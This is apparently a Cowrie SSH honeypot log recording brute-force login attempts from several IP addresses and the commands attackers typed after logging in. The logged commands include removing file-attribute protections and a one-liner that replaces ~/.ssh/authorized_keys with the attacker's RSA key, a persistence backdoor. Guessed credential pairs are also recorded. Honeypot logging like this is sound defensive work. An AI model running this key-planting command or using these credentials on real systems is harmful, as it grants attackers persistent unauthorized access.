{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:39:01.732608Z","src_ip":"46.101.8.63","session":"aea6e22c2648"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:39:01.798863Z","src_ip":"46.101.8.63","session":"aea6e22c2648"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:39:01.799780Z","src_ip":"46.101.8.63","session":"aea6e22c2648"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:39:01.826777Z","src_ip":"46.101.8.63","session":"aea6e22c2648"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:39:01.827839Z","src_ip":"46.101.8.63","session":"aea6e22c2648"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":56860,"dst_ip":"1.2.3.4","dst_port":22,"session":"f69f68f3d45a","protocol":"ssh","message":"New connection: 46.101.8.63:56860 (1.2.3.4:22) [session: f69f68f3d45a]","sensor":"my-vps","timestamp":"2025-09-08T23:39:01.847265Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:39:01.848313Z","src_ip":"46.101.8.63","session":"f69f68f3d45a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:39:01.870468Z","src_ip":"46.101.8.63","session":"f69f68f3d45a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:39:01.998959Z","src_ip":"46.101.8.63","session":"f69f68f3d45a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","size":1412,"shasum":"52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","duplicate":true,"duration":"10.0","message":"Closing TTY Log: var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:39:02.804376Z","src_ip":"212.227.235.229","session":"10802bf2d959"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:39:03.022989Z","src_ip":"46.101.8.63","session":"f69f68f3d45a"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":57494,"dst_ip":"1.2.3.4","dst_port":22,"session":"d83585643021","protocol":"ssh","message":"New connection: 46.101.8.63:57494 (1.2.3.4:22) [session: d83585643021]","sensor":"my-vps","timestamp":"2025-09-08T23:39:03.043062Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:39:03.043908Z","src_ip":"46.101.8.63","session":"d83585643021"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:39:03.065221Z","src_ip":"46.101.8.63","session":"d83585643021"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:39:03.191009Z","src_ip":"46.101.8.63","session":"d83585643021"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:39:03.214414Z","src_ip":"46.101.8.63","session":"aea6e22c2648"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:39:03.215285Z","src_ip":"46.101.8.63","session":"d83585643021"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41350,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d70456da63c","protocol":"ssh","message":"New connection: 212.227.235.229:41350 (1.2.3.4:22) [session: 9d70456da63c]","sensor":"my-vps","timestamp":"2025-09-08T23:39:14.135252Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:39:14.135974Z","src_ip":"212.227.235.229","session":"9d70456da63c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:39:14.442094Z","src_ip":"212.227.235.229","session":"9d70456da63c"}
{"eventid":"cowrie.login.success","username":"root","password":"f00sball","message":"login attempt [root/f00sball] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:39:16.184621Z","src_ip":"212.227.235.229","session":"9d70456da63c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:39:16.861780Z","src_ip":"212.227.235.229","session":"9d70456da63c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:39:16.862521Z","src_ip":"212.227.235.229","session":"9d70456da63c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:39:16.863600Z","src_ip":"212.227.235.229","session":"9d70456da63c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:39:17.445852Z","src_ip":"212.227.235.229","session":"9d70456da63c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:39:18.076510Z","src_ip":"212.227.235.229","session":"9d70456da63c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:39:18.077249Z","src_ip":"212.227.235.229","session":"9d70456da63c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:39:18.385739Z","src_ip":"212.227.235.229","session":"9d70456da63c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:39:18.386739Z","src_ip":"212.227.235.229","session":"9d70456da63c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45964,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c764dd0f8b6","protocol":"ssh","message":"New connection: 212.227.235.229:45964 (1.2.3.4:22) [session: 6c764dd0f8b6]","sensor":"my-vps","timestamp":"2025-09-08T23:39:18.702451Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:39:18.703274Z","src_ip":"212.227.235.229","session":"6c764dd0f8b6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:39:19.019196Z","src_ip":"212.227.235.229","session":"6c764dd0f8b6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:39:20.331308Z","src_ip":"212.227.235.229","session":"6c764dd0f8b6"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":48980,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd3f7a74be9c","protocol":"ssh","message":"New connection: 45.150.34.92:48980 (1.2.3.4:22) [session: fd3f7a74be9c]","sensor":"my-vps","timestamp":"2025-09-08T23:39:21.293064Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:39:21.293717Z","src_ip":"45.150.34.92","session":"fd3f7a74be9c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:39:21.311336Z","src_ip":"45.150.34.92","session":"fd3f7a74be9c"}
{"eventid":"cowrie.login.failed","username":"test3","password":"12345678","message":"login attempt [test3/12345678] failed","sensor":"my-vps","timestamp":"2025-09-08T23:39:21.424426Z","src_ip":"45.150.34.92","session":"fd3f7a74be9c"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:39:21.663413Z","src_ip":"212.227.235.229","session":"6c764dd0f8b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45980,"dst_ip":"1.2.3.4","dst_port":22,"session":"3bc362ce7416","protocol":"ssh","message":"New connection: 212.227.235.229:45980 (1.2.3.4:22) [session: 3bc362ce7416]","sensor":"my-vps","timestamp":"2025-09-08T23:39:21.967151Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:39:21.968820Z","src_ip":"212.227.235.229","session":"3bc362ce7416"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:39:22.443938Z","src_ip":"45.150.34.92","session":"fd3f7a74be9c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:39:22.507875Z","src_ip":"212.227.235.229","session":"3bc362ce7416"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:39:23.828304Z","src_ip":"212.227.235.229","session":"3bc362ce7416"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:39:24.145560Z","src_ip":"212.227.235.229","session":"9d70456da63c"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:39:24.147211Z","src_ip":"212.227.235.229","session":"3bc362ce7416"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":51614,"dst_ip":"1.2.3.4","dst_port":22,"session":"8da47cf4777e","protocol":"ssh","message":"New connection: 93.113.63.124:51614 (1.2.3.4:22) [session: 8da47cf4777e]","sensor":"my-vps","timestamp":"2025-09-08T23:39:24.287206Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:39:24.288177Z","src_ip":"93.113.63.124","session":"8da47cf4777e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:39:24.347114Z","src_ip":"93.113.63.124","session":"8da47cf4777e"}
{"eventid":"cowrie.login.failed","username":"debian","password":"debian@123","message":"login attempt [debian/debian@123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:39:24.663827Z","src_ip":"93.113.63.124","session":"8da47cf4777e"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:39:25.840640Z","src_ip":"93.113.63.124","session":"8da47cf4777e"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":43758,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b881c346fc5","protocol":"ssh","message":"New connection: 182.18.161.165:43758 (1.2.3.4:22) [session: 5b881c346fc5]","sensor":"my-vps","timestamp":"2025-09-08T23:39:55.669600Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:39:55.671074Z","src_ip":"182.18.161.165","session":"5b881c346fc5"}
